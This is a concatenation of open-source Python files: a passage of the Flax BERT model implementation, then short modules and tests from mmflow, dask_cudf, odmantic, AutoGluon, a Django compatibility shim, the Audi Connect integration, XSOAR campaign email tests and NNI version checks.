position_ids: Optional[jnp.ndarray] = None,
head_mask: Optional[jnp.ndarray] = None,
encoder_hidden_states: Optional[jnp.ndarray] = None,
encoder_attention_mask: Optional[jnp.ndarray] = None,
init_cache: bool = False,
deterministic: bool = True,
output_attentions: bool = False,
output_hidden_states: bool = False,
return_dict: bool = True,
):
# make sure `token_type_ids` is correctly initialized when not passed
if token_type_ids is None:
token_type_ids = jnp.zeros_like(input_ids)
# make sure `position_ids` is correctly initialized when not passed
if position_ids is None:
position_ids = jnp.broadcast_to(jnp.arange(jnp.atleast_2d(input_ids).shape[-1]), input_ids.shape)
hidden_states = self.embeddings(
input_ids, token_type_ids, position_ids, attention_mask, deterministic=deterministic
)
outputs = self.encoder(
hidden_states,
attention_mask,
head_mask=head_mask,
deterministic=deterministic,
encoder_hidden_states=encoder_hidden_states,
encoder_attention_mask=encoder_attention_mask,
init_cache=init_cache,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
hidden_states = outputs[0]
pooled = self.pooler(hidden_states) if self.add_pooling_layer else None
if not return_dict:
# if pooled is None, don't return it
if pooled is None:
return (hidden_states,) + outputs[1:]
return (hidden_states, pooled) + outputs[1:]
return FlaxBaseModelOutputWithPoolingAndCrossAttentions(
last_hidden_state=hidden_states,
pooler_output=pooled,
hidden_states=outputs.hidden_states,
attentions=outputs.attentions,
cross_attentions=outputs.cross_attentions,
)
@add_start_docstrings(
"The bare Bert Model transformer outputting raw hidden-states without any specific head on top.",
BERT_START_DOCSTRING,
)
class FlaxBertModel(FlaxBertPreTrainedModel):
module_class = FlaxBertModule
append_call_sample_docstring(
FlaxBertModel, _TOKENIZER_FOR_DOC, _CHECKPOINT_FOR_DOC, FlaxBaseModelOutputWithPooling, _CONFIG_FOR_DOC
)
class FlaxBertForPreTrainingModule(nn.Module):
config: BertConfig
dtype: jnp.dtype = jnp.float32
def setup(self):
self.bert = FlaxBertModule(config=self.config, dtype=self.dtype)
self.cls = FlaxBertPreTrainingHeads(config=self.config, dtype=self.dtype)
def __call__(
self,
input_ids,
attention_mask,
token_type_ids,
position_ids,
head_mask,
deterministic: bool = True,
output_attentions: bool = False,
output_hidden_states: bool = False,
return_dict: bool = True,
):
# Model
outputs = self.bert(
input_ids,
attention_mask,
token_type_ids,
position_ids,
head_mask,
deterministic=deterministic,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
if self.config.tie_word_embeddings:
shared_embedding = self.bert.variables["params"]["embeddings"]["word_embeddings"]["embedding"]
else:
shared_embedding = None
hidden_states = outputs[0]
pooled_output = outputs[1]
prediction_scores, seq_relationship_score = self.cls(
hidden_states, pooled_output, shared_embedding=shared_embedding
)
if not return_dict:
return (prediction_scores, seq_relationship_score) + outputs[2:]
return FlaxBertForPreTrainingOutput(
prediction_logits=prediction_scores,
seq_relationship_logits=seq_relationship_score,
hidden_states=outputs.hidden_states,
attentions=outputs.attentions,
)
@add_start_docstrings(
"""
Bert Model with two heads on top as done during the pretraining: a `masked language modeling` head and a `next
sentence prediction (classification)` head.
""",
BERT_START_DOCSTRING,
)
class FlaxBertForPreTraining(FlaxBertPreTrainedModel):
module_class = FlaxBertForPreTrainingModule
FLAX_BERT_FOR_PRETRAINING_DOCSTRING = """
Returns:
Example:
```python
>>> from transformers import BertTokenizer, FlaxBertForPreTraining
>>> tokenizer = BertTokenizer.from_pretrained("bert-base-uncased")
>>> model = FlaxBertForPreTraining.from_pretrained("bert-base-uncased")
>>> inputs = tokenizer("Hello, my dog is cute", return_tensors="np")
>>> outputs = model(**inputs)
>>> prediction_logits = outputs.prediction_logits
>>> seq_relationship_logits = outputs.seq_relationship_logits
```
"""
overwrite_call_docstring(
FlaxBertForPreTraining,
BERT_INPUTS_DOCSTRING.format("batch_size, sequence_length") + FLAX_BERT_FOR_PRETRAINING_DOCSTRING,
)
append_replace_return_docstrings(
FlaxBertForPreTraining, output_type=FlaxBertForPreTrainingOutput, config_class=_CONFIG_FOR_DOC
)
class FlaxBertForMaskedLMModule(nn.Module):
config: BertConfig
dtype: jnp.dtype = jnp.float32
def setup(self):
self.bert = FlaxBertModule(config=self.config, add_pooling_layer=False, dtype=self.dtype)
self.cls = FlaxBertOnlyMLMHead(config=self.config, dtype=self.dtype)
def __call__(
self,
input_ids,
attention_mask,
token_type_ids,
position_ids,
head_mask,
deterministic: bool = True,
output_attentions: bool = False,
output_hidden_states: bool = False,
return_dict: bool = True,
):
# Model
outputs = self.bert(
input_ids,
attention_mask,
token_type_ids,
position_ids,
head_mask,
deterministic=deterministic,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
hidden_states = outputs[0]
if self.config.tie_word_embeddings:
shared_embedding = self.bert.variables["params"]["embeddings"]["word_embeddings"]["embedding"]
else:
shared_embedding = None
# Compute the prediction scores
logits = self.cls(hidden_states, shared_embedding=shared_embedding)
if not return_dict:
return (logits,) + outputs[1:]
return FlaxMaskedLMOutput(
logits=logits,
hidden_states=outputs.hidden_states,
attentions=outputs.attentions,
)
@add_start_docstrings("""Bert Model with a `language modeling` head on top.""", BERT_START_DOCSTRING)
class FlaxBertForMaskedLM(FlaxBertPreTrainedModel):
module_class = FlaxBertForMaskedLMModule
append_call_sample_docstring(
FlaxBertForMaskedLM, _TOKENIZER_FOR_DOC, _CHECKPOINT_FOR_DOC, FlaxMaskedLMOutput, _CONFIG_FOR_DOC
)
class FlaxBertForNextSentencePredictionModule(nn.Module):
config: BertConfig
dtype: jnp.dtype = jnp.float32
def setup(self):
self.bert = FlaxBertModule(config=self.config, dtype=self.dtype)
self.cls = FlaxBertOnlyNSPHead(dtype=self.dtype)
def __call__(
self,
input_ids,
attention_mask,
token_type_ids,
position_ids,
head_mask,
deterministic: bool = True,
output_attentions: bool = False,
output_hidden_states: bool = False,
return_dict: bool = True,
):
return_dict = return_dict if return_dict is not None else self.config.return_dict
# Model
outputs = self.bert(
input_ids,
attention_mask,
token_type_ids,
position_ids,
head_mask,
deterministic=deterministic,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
pooled_output = outputs[1]
seq_relationship_scores = self.cls(pooled_output)
if not return_dict:
return (seq_relationship_scores,) + outputs[2:]
return FlaxNextSentencePredictorOutput(
logits=seq_relationship_scores,
hidden_states=outputs.hidden_states,
attentions=outputs.attentions,
)
@add_start_docstrings(
"""Bert Model with a `next sentence prediction (classification)` head on top.""",
BERT_START_DOCSTRING,
)
class FlaxBertForNextSentencePrediction(FlaxBertPreTrainedModel):
module_class = FlaxBertForNextSentencePredictionModule
FLAX_BERT_FOR_NEXT_SENT_PRED_DOCSTRING = """
Returns:
Example:
```python
>>> from transformers import BertTokenizer, FlaxBertForNextSentencePrediction
>>> tokenizer = BertTokenizer.from_pretrained("bert-base-uncased")
>>> model = FlaxBertForNextSentencePrediction.from_pretrained("bert-base-uncased")
>>> prompt = "In Italy, pizza served in formal settings, such as at a restaurant, is presented unsliced."
>>> next_sentence = "The sky is blue due to the shorter wavelength of blue light."
>>> encoding = tokenizer(prompt, next_sentence, return_tensors="jax")
>>> outputs = model(**encoding)
>>> logits = outputs.logits
>>> assert logits[0, 0] < logits[0, 1] # next sentence was random
```
"""
overwrite_call_docstring(
FlaxBertForNextSentencePrediction,
BERT_INPUTS_DOCSTRING.format("batch_size, sequence_length") + FLAX_BERT_FOR_NEXT_SENT_PRED_DOCSTRING,
)
append_replace_return_docstrings(
FlaxBertForNextSentencePrediction, output_type=FlaxNextSentencePredictorOutput, config_class=_CONFIG_FOR_DOC
)
class FlaxBertForSequenceClassificationModule(nn.Module):
config: BertConfig
dtype: jnp.dtype = jnp.float32
def setup(self):
self.bert = FlaxBertModule(config=self.config, dtype=self.dtype)
classifier_dropout = (
self.config.classifier_dropout
if self.config.classifier_dropout is not None
else self.config.hidden_dropout_prob
)
self.dropout = nn.Dropout(rate=classifier_dropout)
self.classifier = nn.Dense(
self.config.num_labels,
dtype=self.dtype,
)
def __call__(
self,
input_ids,
attention_mask,
token_type_ids,
position_ids,
head_mask,
deterministic: bool = True,
output_attentions: bool = False,
output_hidden_states: bool = False,
return_dict: bool = True,
):
# Model
outputs = self.bert(
input_ids,
attention_mask,
token_type_ids,
position_ids,
head_mask,
deterministic=deterministic,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
pooled_output = outputs[1]
pooled_output = self.dropout(pooled_output, deterministic=deterministic)
logits = self.classifier(pooled_output)
if not return_dict:
return (logits,) + outputs[2:]
return FlaxSequenceClassifierOutput(
logits=logits,
hidden_states=outputs.hidden_states,
attentions=outputs.attentions,
)
@add_start_docstrings(
"""
Bert Model transformer with a sequence classification/regression head on top (a linear layer on top of the pooled
output) e.g. for GLUE tasks.
""",
BERT_START_DOCSTRING,
)
class FlaxBertForSequenceClassification(FlaxBertPreTrainedModel):
module_class = FlaxBertForSequenceClassificationModule
append_call_sample_docstring(
FlaxBertForSequenceClassification,
_TOKENIZER_FOR_DOC,
_CHECKPOINT_FOR_DOC,
FlaxSequenceClassifierOutput,
_CONFIG_FOR_DOC,
)
class FlaxBertForMultipleChoiceModule(nn.Module):
config: BertConfig
dtype: jnp.dtype = jnp.float32
def setup(self):
self.bert = FlaxBertModule(config=self.config, dtype=self.dtype)
self.dropout = nn.Dropout(rate=self.config.hidden_dropout_prob)
self.classifier = nn.Dense(1, dtype=self.dtype)
def __call__(
self,
input_ids,
attention_mask,
token_type_ids,
position_ids,
head_mask,
deterministic: bool = True,
output_attentions: bool = False,
output_hidden_states: bool = False,
return_dict: bool = True,
):
num_choices = input_ids.shape[1]
input_ids = input_ids.reshape(-1, input_ids.shape[-1]) if input_ids is not None else None
attention_mask = attention_mask.reshape(-1, attention_mask.shape[-1]) if attention_mask is not None else None
token_type_ids = token_type_ids.reshape(-1, token_type_ids.shape[-1]) if token_type_ids is not None else None
position_ids = position_ids.reshape(-1, position_ids.shape[-1]) if position_ids is not None else None
# Model
outputs = self.bert(
input_ids,
attention_mask,
token_type_ids,
position_ids,
head_mask,
deterministic=deterministic,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
pooled_output = outputs[1]
pooled_output = self.dropout(pooled_output, deterministic=deterministic)
logits = self.classifier(pooled_output)
reshaped_logits = logits.reshape(-1, num_choices)
if not return_dict:
return (reshaped_logits,) + outputs[2:]
return FlaxMultipleChoiceModelOutput(
logits=reshaped_logits,
hidden_states=outputs.hidden_states,
attentions=outputs.attentions,
)
@add_start_docstrings(
"""
Bert Model with a multiple choice classification head on top (a linear layer on top of the pooled output and a
softmax) e.g. for RocStories/SWAG tasks.
""",
BERT_START_DOCSTRING,
)
class FlaxBertForMultipleChoice(FlaxBertPreTrainedModel):
module_class = FlaxBertForMultipleChoiceModule
overwrite_call_docstring(
FlaxBertForMultipleChoice, BERT_INPUTS_DOCSTRING.format("batch_size, num_choices, sequence_length")
)
append_call_sample_docstring(
FlaxBertForMultipleChoice, _TOKENIZER_FOR_DOC, _CHECKPOINT_FOR_DOC, FlaxMultipleChoiceModelOutput, _CONFIG_FOR_DOC
)
class FlaxBertForTokenClassificationModule(nn.Module):
config: BertConfig
dtype: jnp.dtype = jnp.float32
def setup(self):
self.bert = FlaxBertModule(config=self.config, dtype=self.dtype, add_pooling_layer=False)
classifier_dropout = (
self.config.classifier_dropout
if self.config.classifier_dropout is not None
else self.config.hidden_dropout_prob
)
self.dropout = nn.Dropout(rate=classifier_dropout)
self.classifier = nn.Dense(self.config.num_labels, dtype=self.dtype)
def __call__(
self,
input_ids,
attention_mask,
token_type_ids,
position_ids,
head_mask,
deterministic: bool = True,
output_attentions: bool = False,
output_hidden_states: bool = False,
return_dict: bool = True,
):
# Model
outputs = self.bert(
input_ids,
attention_mask,
token_type_ids,
position_ids,
head_mask,
deterministic=deterministic,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
hidden_states = outputs[0]
hidden_states = self.dropout(hidden_states, deterministic=deterministic)
logits = self.classifier(hidden_states)
if not return_dict:
return (logits,) + outputs[1:]
return FlaxTokenClassifierOutput(
logits=logits,
hidden_states=outputs.hidden_states,
attentions=outputs.attentions,
)
@add_start_docstrings(
"""
Bert Model with a token classification head on top (a linear layer on top of the hidden-states output) e.g. for
Named-Entity-Recognition (NER) tasks.
""",
BERT_START_DOCSTRING,
)
class FlaxBertForTokenClassification(FlaxBertPreTrainedModel):
module_class = FlaxBertForTokenClassificationModule
append_call_sample_docstring(
FlaxBertForTokenClassification, _TOKENIZER_FOR_DOC, _CHECKPOINT_FOR_DOC, FlaxTokenClassifierOutput, _CONFIG_FOR_DOC
)
class FlaxBertForQuestionAnsweringModule(nn.Module):
config: BertConfig
dtype: jnp.dtype = jnp.float32
def setup(self):
self.bert = FlaxBertModule(config=self.config, dtype=self.dtype, add_pooling_layer=False)
self.qa_outputs = nn.Dense(self.config.num_labels, dtype=self.dtype)
def __call__(
self,
input_ids,
attention_mask,
token_type_ids,
position_ids,
head_mask,
deterministic: bool = True,
output_attentions: bool = False,
output_hidden_states: bool = False,
return_dict: bool = True,
):
# Model
outputs = self.bert(
input_ids,
attention_mask,
token_type_ids,
position_ids,
head_mask,
deterministic=deterministic,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
hidden_states = outputs[0]
logits = self.qa_outputs(hidden_states)
start_logits, end_logits = logits.split(self.config.num_labels, axis=-1)
start_logits = start_logits.squeeze(-1)
end_logits = end_logits.squeeze(-1)
if not return_dict:
return (start_logits, end_logits) + outputs[1:]
return FlaxQuestionAnsweringModelOutput(
start_logits=start_logits,
end_logits=end_logits,
hidden_states=outputs.hidden_states,
attentions=outputs.attentions,
)
@add_start_docstrings(
"""
Bert Model with a span classification head on top for extractive question-answering tasks like SQuAD (a linear
layers on top of the hidden-states output to compute `span start logits` and `span end logits`).
""",
BERT_START_DOCSTRING,
)
class FlaxBertForQuestionAnswering(FlaxBertPreTrainedModel):
module_class = FlaxBertForQuestionAnsweringModule
append_call_sample_docstring(
FlaxBertForQuestionAnswering,
_TOKENIZER_FOR_DOC,
_CHECKPOINT_FOR_DOC,
FlaxQuestionAnsweringModelOutput,
_CONFIG_FOR_DOC,
)
class FlaxBertForCausalLMModule(nn.Module):
config: BertConfig
dtype: jnp.dtype = jnp.float32
def setup(self):
self.bert = FlaxBertModule(config=self.config, add_pooling_layer=False, dtype=self.dtype)
self.cls = FlaxBertOnlyMLMHead(config=self.config, dtype=self.dtype)
def __call__(
self,
input_ids,
attention_mask,
position_ids,
token_type_ids: Optional[jnp.ndarray] = None,
head_mask: Optional[jnp.ndarray] = None,
encoder_hidden_states: Optional[jnp.ndarray] = None,
encoder_attention_mask: Optional[jnp.ndarray] = None,
init_cache: bool = False,
deterministic: bool = True,
output_attentions: bool = False,
output_hidden_states: bool = False,
return_dict: bool = True,
):
# Model
outputs = self.bert(
input_ids,
attention_mask,
token_type_ids,
position_ids,
head_mask,
encoder_hidden_states=encoder_hidden_states,
encoder_attention_mask=encoder_attention_mask,
init_cache=init_cache,
deterministic=deterministic,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
)
hidden_states = outputs[0]
if self.config.tie_word_embeddings:
shared_embedding = self.bert.variables["params"]["embeddings"]["word_embeddings"]["embedding"]
else:
shared_embedding = None
# Compute the prediction scores
logits = self.cls(hidden_states, shared_embedding=shared_embedding)
if not return_dict:
return (logits,) + outputs[1:]
return FlaxCausalLMOutputWithCrossAttentions(
logits=logits,
hidden_states=outputs.hidden_states,
attentions=outputs.attentions,
cross_attentions=outputs.cross_attentions,
)
@add_start_docstrings(
"""
Bert Model with a language modeling head on top (a linear layer on top of the hidden-states output) e.g for
autoregressive tasks.
""",
BERT_START_DOCSTRING,
)
class FlaxBertForCausalLM(FlaxBertPreTrainedModel):
module_class = FlaxBertForCausalLMModule
def prepare_inputs_for_generation(self, input_ids, max_length, attention_mask: Optional[jnp.DeviceArray] = None):
# initializing the cache
batch_size, seq_length = input_ids.shape
past_key_values = self.init_cache(batch_size, max_length)
# Note that usually one would have to put 0's in the attention_mask for x > input_ids.shape[-1] and x < cache_length.
# But since the decoder uses a causal mask, those positions are masked anyway.
# Thus, we can create a single static attention_mask here, which is more efficient for compilation
extended_attention_mask = jnp.ones((batch_size, max_length), dtype="i4")
if attention_mask is not None:
position_ids = attention_mask.cumsum(axis=-1) - 1
extended_attention_mask = lax.dynamic_update_slice(extended_attention_mask, attention_mask, (0, 0))
else:
position_ids = jnp.broadcast_to(jnp.arange(seq_length, dtype="i4")[None, :], (batch_size, seq_length))
return {
"past_key_values": past_key_values,
"attention_mask": extended_attention_mask,
"position_ids": position_ids,
}
def update_inputs_for_generation(self, model_outputs, model_kwargs):
model_kwargs["past_key_values"] = model_outputs.past_key_values
model_kwargs["position_ids"] = model_kwargs["position_ids"][:, -1:] + 1
return model_kwargs
append_call_sample_docstring(
FlaxBertForCausalLM,
_TOKENIZER_FOR_DOC,
_CHECKPOINT_FOR_DOC,
FlaxCausalLMOutputWithCrossAttentions,
_CONFIG_FOR_DOC,
)
|
mmflow/models/utils/estimators_link.py
|
hologerry/mmflow
| 481 |
103051
|
# Copyright (c) OpenMMLab. All rights reserved.
import torch
import torch.nn as nn
from torch import Tensor
from mmflow.ops import build_operators
class LinkOutput:
"""The link output between two estimators in FlowNet2."""
def __init__(self) -> None:
self.upsample_flow = None
self.scaled_flow = None
self.norm_scaled_flow = None
self.warped_img2 = None
self.diff = None
self.brightness_err = None
class BasicLink(nn.Module):
"""Connect two separate flow estimators.
BasicLink compute the following 5 values: upsampled flow prediction,
normalized upsampled flow prediction, warped image, difference between the
first image and warped image, brightness error.
Args:
scale_factor (int): Scale factor of upsampling. Default to 4.
mode (str): Algorithm used for upsampling: 'nearest' , 'linear' ,
'bilinear' , 'bicubic' , 'trilinear' , 'area'. Default: 'bilinear'.
warp_cfg (dict): Config for warp operator. Default to
dict(type='Warp', padding_mode='border', align_corners=True))
"""
def __init__(self,
scale_factor: int = 4,
mode: str = 'bilinear',
warp_cfg: dict = dict(
type='Warp', padding_mode='border', align_corners=True)):
super(BasicLink, self).__init__()
self.warp = build_operators(warp_cfg)
self.upSample = nn.Upsample(scale_factor=scale_factor, mode=mode)
def __call__(self, img1: Tensor, img2: Tensor, flow: Tensor,
flow_div: float) -> LinkOutput:
"""Call function for BasicLink.
Args:
img1 (Tensor): The first input image.
img2 (Tensor): The second input images.
flow (Tensor): The estimated optical flow from the first image to
the second image.
flow_div (float): The divisor for scaling the value of optical
flow.
Returns:
LinkOutput: The output for the next flow estimator.
"""
upsample_flow = self.upSample(flow)
scaled_flow = self.upSample(flow) * flow_div
norm_scaled_flow = torch.norm(scaled_flow, p=2, dim=1, keepdim=True)
warped_img2 = self.warp(img2, scaled_flow)
diff = img1 - warped_img2
bright_err = torch.norm(diff, p=2, dim=1, keepdim=True)
output = LinkOutput()
output.upsample_flow = upsample_flow
output.scaled_flow = scaled_flow
output.norm_scaled_flow = norm_scaled_flow
output.warped_img2 = warped_img2
output.diff = diff
output.brightness_err = bright_err
return output
|
python/dask_cudf/dask_cudf/tests/test_applymap.py
|
Ahsantw/cudf
| 239 |
103056
|
# Copyright (c) 2022, NVIDIA CORPORATION.
import pytest
from pandas import NA
from dask import dataframe as dd
from dask_cudf.tests.utils import _make_random_frame
@pytest.mark.parametrize(
"func",
[
lambda x: x + 1,
lambda x: x - 0.5,
lambda x: 2 if x is NA else 2 + (x + 1) / 4.1,
lambda x: 42,
],
)
@pytest.mark.parametrize("has_na", [True, False])
def test_applymap_basic(func, has_na):
size = 2000
pdf, dgdf = _make_random_frame(size, include_na=False)
dpdf = dd.from_pandas(pdf, npartitions=dgdf.npartitions)
expect = dpdf.applymap(func)
got = dgdf.applymap(func)
dd.assert_eq(expect, got, check_dtype=False)
|
docs/examples_src/raw_query_usage/parse_with_unset_default.py
|
dynalz/odmantic
| 486 |
103066
|
from bson import ObjectId
from odmantic import Model
class Player(Model):
name: str
level: int = 1
document = {"name": "Leeroy", "_id": ObjectId("5f8352a87a733b8b18b0cb27")}
user = Player.parse_doc(document)
print(repr(user))
#> Player(
#> id=ObjectId("5f8352a87a733b8b18b0cb27"),
#> name="Leeroy",
#> level=1,
#> )
|
core/tests/unittests/test_feature_selection.py
|
zhiqiangdon/autogluon
| 4,462 |
103078
|
from autogluon.core.utils.feature_selection import *
from autogluon.core.utils.utils import unevaluated_fi_df_template
import numpy as np
from numpy.core.fromnumeric import sort
import pandas as pd
import pytest
def evaluated_fi_df_template(features, importance=None, n=None):
rng = np.random.default_rng(0)
importance_df = pd.DataFrame({'name': features})
importance_df['importance'] = rng.standard_normal(len(features)) if importance is None else importance
importance_df['stddev'] = rng.standard_normal(len(features))
importance_df['p_value'] = None
importance_df['n'] = 5 if n is None else n
importance_df.set_index('name', inplace=True)
importance_df.index.name = None
return importance_df
@pytest.fixture
def sample_features():
return ['a', 'b', 'c', 'd', 'e']
@pytest.fixture
def sample_importance_df_1(sample_features):
return evaluated_fi_df_template(sample_features, importance=[0.2, 0.2, None, 1., None], n=[10, 5, 0, 5, 0])
@pytest.fixture
def sample_importance_df_2(sample_features):
return evaluated_fi_df_template(sample_features, importance=[-0.1, -0.1, 0.1, None, None], n=[5, 10, 10, 0, 0])
def test_add_noise_column_df():
# test noise columns are appended to input dataframe and feature_metadata
X = pd.DataFrame({'a': [1, 2]})
args = {'rng': np.random.default_rng(0), 'count': 2}
X_noised, noise_columns = add_noise_column(X, **args)
expected_features = X.columns.tolist() + noise_columns
assert expected_features == X_noised.columns.tolist()
def test_merge_importance_dfs_base(sample_features):
# test the scenario when previous feature importance df is none
prev_df, curr_df = None, unevaluated_fi_df_template(sample_features)
assert merge_importance_dfs(prev_df, curr_df, using_prev_fit_fi=set()) is curr_df
def test_merge_importance_dfs_same_model(sample_features, sample_importance_df_1, sample_importance_df_2):
# test the scenario where previous feature importance df exists and its importance estimates come from the same fitted model
prev_df, curr_df = sample_importance_df_1, sample_importance_df_2
result_df = merge_importance_dfs(prev_df, curr_df, using_prev_fit_fi=set())
assert [score if score == score else None for score in result_df['importance'].tolist()] == [0., 0.1, 0.1, 1., None]
assert result_df['n'].tolist() == [15, 15, 10, 5, 0]
def test_merge_importance_dfs_different_model(sample_features, sample_importance_df_1, sample_importance_df_2):
# test the scenario where previous feature importance df exists and its importance estimates come from a different fitted model
prev_df, curr_df = sample_importance_df_1, sample_importance_df_2
using_prev_fit_fi = set(sample_features)
result_df = merge_importance_dfs(prev_df, curr_df, using_prev_fit_fi=using_prev_fit_fi).sort_index()
assert len(using_prev_fit_fi) == 2
assert [score if score == score else None for score in result_df['importance'].tolist()] == [-0.1, -0.1, 0.1, 1., None]
assert result_df['n'].tolist() == [5, 10, 10, 5, 0]
def test_merge_importance_dfs_all(sample_features, sample_importance_df_1, sample_importance_df_2):
# test the scenario where previous feature importance df exists and its importance estimates come from both same and different fitted models
prev_df, curr_df = sample_importance_df_1, sample_importance_df_2
using_prev_fit_fi = set([sample_features[0]])
result_df = merge_importance_dfs(prev_df, curr_df, using_prev_fit_fi=using_prev_fit_fi).sort_index()
assert [score if score == score else None for score in result_df['importance'].tolist()] == [-0.1, 0., 0.1, 1., None]
assert result_df['n'].tolist() == [5, 15, 10, 5, 0]
assert using_prev_fit_fi == set()
def test_sort_features_by_priority_base(sample_features):
# test the ordering of feature importance computation when no prior feature importance computation was done
sorted_features = sort_features_by_priority(features=sample_features, prev_importance_df=None, using_prev_fit_fi=set())
assert sorted_features == sample_features
def test_sort_features_by_priority_same_model(sample_features):
# test the ordering of feature importance computation when prior feature importance computation from the same fitted model was done
prev_importance_df = evaluated_fi_df_template(sample_features)
sorted_features = sort_features_by_priority(features=sample_features, prev_importance_df=prev_importance_df, using_prev_fit_fi=set())
assert sorted_features == prev_importance_df.sort_values('importance').index.tolist()
def test_sort_features_by_priority_different_model(sample_features):
# test the ordering of feature importance computation when prior feature importance computation from a different fitted model was done
prev_importance_df = evaluated_fi_df_template(sample_features)
using_prev_fit_fi = sample_features[-2:]
sorted_features = sort_features_by_priority(features=sample_features, prev_importance_df=prev_importance_df, using_prev_fit_fi=using_prev_fit_fi)
sorted_prev_fit_features = prev_importance_df[prev_importance_df.index.isin(using_prev_fit_fi)].sort_values('importance').index.tolist()
sorted_curr_fit_features = prev_importance_df[~prev_importance_df.index.isin(using_prev_fit_fi)].sort_values('importance').index.tolist()
expected_features = sorted_prev_fit_features + sorted_curr_fit_features
assert sorted_features == expected_features
def test_sort_features_by_priority_all(sample_features):
# test the ordering of feature importance computation when feature impotance computation comes from mix of current and previous fit models,
# and some feature are unevaluated
length = len(sample_features)
using_prev_fit_fi = set(sample_features[:length//3])
evaluated_rows, unevaluated_rows = evaluated_fi_df_template(sample_features[:length//2]), unevaluated_fi_df_template(sample_features[length//2:])
prev_importance_df = pd.concat([evaluated_rows, unevaluated_rows])
sorted_features = sort_features_by_priority(features=sample_features, prev_importance_df=prev_importance_df, using_prev_fit_fi=using_prev_fit_fi)
unevaluated_features = unevaluated_rows.index.tolist()
sorted_prev_fit_features = evaluated_rows[(~evaluated_rows.index.isin(sample_features[length//2:]))
& (evaluated_rows.index.isin(using_prev_fit_fi))].sort_values('importance').index.tolist()
sorted_curr_fit_features = evaluated_rows[(~evaluated_rows.index.isin(sample_features[length//2:]))
& (~evaluated_rows.index.isin(using_prev_fit_fi))].sort_values('importance').index.tolist()
expected_features = unevaluated_features + sorted_prev_fit_features + sorted_curr_fit_features
assert sorted_features == expected_features
|
_compact.py
|
egemen61/excell
| 253 |
103084
|
<gh_stars>100-1000
try:
from django.http import JsonResponse
except ImportError:
from django.http import HttpResponse
import json
def JsonResponse(data):
return HttpResponse(json.dumps(data),
content_type="application/json")
|
custom_components/audiconnect/const.py
|
andersop91/audi_connect_ha
| 103 |
103094
|
DOMAIN = "audiconnect"
CONF_VIN = "vin"
CONF_CARNAME = "carname"
CONF_ACTION = "action"
MIN_UPDATE_INTERVAL = 5
DEFAULT_UPDATE_INTERVAL = 10
CONF_SPIN = "spin"
CONF_REGION = "region"
CONF_SERVICE_URL = "service_url"
CONF_MUTABLE = "mutable"
SIGNAL_STATE_UPDATED = "{}.updated".format(DOMAIN)
TRACKER_UPDATE = f"{DOMAIN}_tracker_update"
RESOURCES = [
"position",
"last_update_time",
"mileage",
"range",
"service_inspection_time",
"service_inspection_distance",
"oil_change_time",
"oil_change_distance",
"oil_level",
"charging_state",
"max_charge_current",
"engine_type1",
"engine_type2",
"parking_light",
"any_window_open",
"any_door_unlocked",
"any_door_open",
"trunk_unlocked",
"trunk_open",
"hood_open",
"tank_level",
"state_of_charge",
"remaining_charging_time",
"plug_state",
"sun_roof",
"doors_trunk_status",
]
COMPONENTS = {
"sensor": "sensor",
"binary_sensor": "binary_sensor",
"lock": "lock",
"device_tracker": "device_tracker",
"switch": "switch",
}
|
Packs/Campaign/Scripts/SendEmailToCampaignRecipients/SendEmailToCampaignRecipients_test.py
|
SergeBakharev/content
| 799 |
103127
|
<reponame>SergeBakharev/content<gh_stars>100-1000
import pytest
from SendEmailToCampaignRecipients import *
CAMPAIGN_EMAIL_TO = 'campaignemailto'
CAMPAIGN_EMAIL_SUBJECT = 'campaignemailsubject'
CAMPAIGN_EMAIL_BODY = 'campaignemailbody'
NUM_OF_INCIDENTS = 5
INCIDENT_IDS = [str(i) for i in range(NUM_OF_INCIDENTS)]
CUSTOM_FIELDS = {
CAMPAIGN_EMAIL_TO: '<EMAIL>',
CAMPAIGN_EMAIL_SUBJECT: 'Campaign Detected',
CAMPAIGN_EMAIL_BODY: 'PLease check the email'
}
MOCKED_INCIDENT = {
'id': 100,
'CustomFields': CUSTOM_FIELDS
}
def test_send_email_happy_path(mocker):
"""
Given -
Mocked custom field for an incident
When -
Run the main of the command
Then -
Validate the expected args sent to demisto.executeCommand
"""
# prepare
mocker.patch.object(demisto, 'incidents', return_value=[MOCKED_INCIDENT])
mocker.patch.object(demisto, 'executeCommand')
# run
main()
# validate
assert demisto.executeCommand.call_args[0][0] == 'send-mail'
command_arg_dict = demisto.executeCommand.call_args[0][1]
for custom_filed_key, command_key in zip(CUSTOM_FIELDS.keys(), ['to', 'subject', 'body']):
assert command_arg_dict[command_key] == CUSTOM_FIELDS[custom_filed_key]
def test_no_email_to(mocker):
"""
Given -
Empty emailto in the incident
When -
Try to send email
Then -
Validate return_error was called
"""
# prepare
mocker.patch.object(demisto, 'incidents', return_value=[MOCKED_INCIDENT])
mocker.patch.object(demisto, 'results')
CUSTOM_FIELDS[CAMPAIGN_EMAIL_TO] = ''
# run
try:
main()
pytest.fail('SystemExit should occurred as return_error was called')
except SystemExit:
args = demisto.results.call_args[0][0]
assert args['Contents'] == INVALID_EMAIL_TO_MSG
|
nni/common/version.py
|
Microsoft/nni
| 2,305 |
103143
|
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
from __future__ import annotations
import logging
import sys
import warnings
import cloudpickle
import json_tricks
import numpy
import yaml
import nni
def _minor_version_tuple(version_str: str) -> tuple[int, int]:
# If not a number, returns -1 (e.g., 999.dev0 -> (999, -1))
return tuple(int(x) if x.isdigit() else -1 for x in version_str.split(".")[:2])
PYTHON_VERSION = sys.version_info[:2]
NUMPY_VERSION = _minor_version_tuple(numpy.__version__)
try:
import torch
TORCH_VERSION = _minor_version_tuple(torch.__version__)
except ImportError:
logging.getLogger(__name__).info("PyTorch is not installed.")
TORCH_VERSION = None
try:
import pytorch_lightning
PYTORCH_LIGHTNING_VERSION = _minor_version_tuple(pytorch_lightning.__version__)
except ImportError:
logging.getLogger(__name__).info("PyTorch Lightning is not installed.")
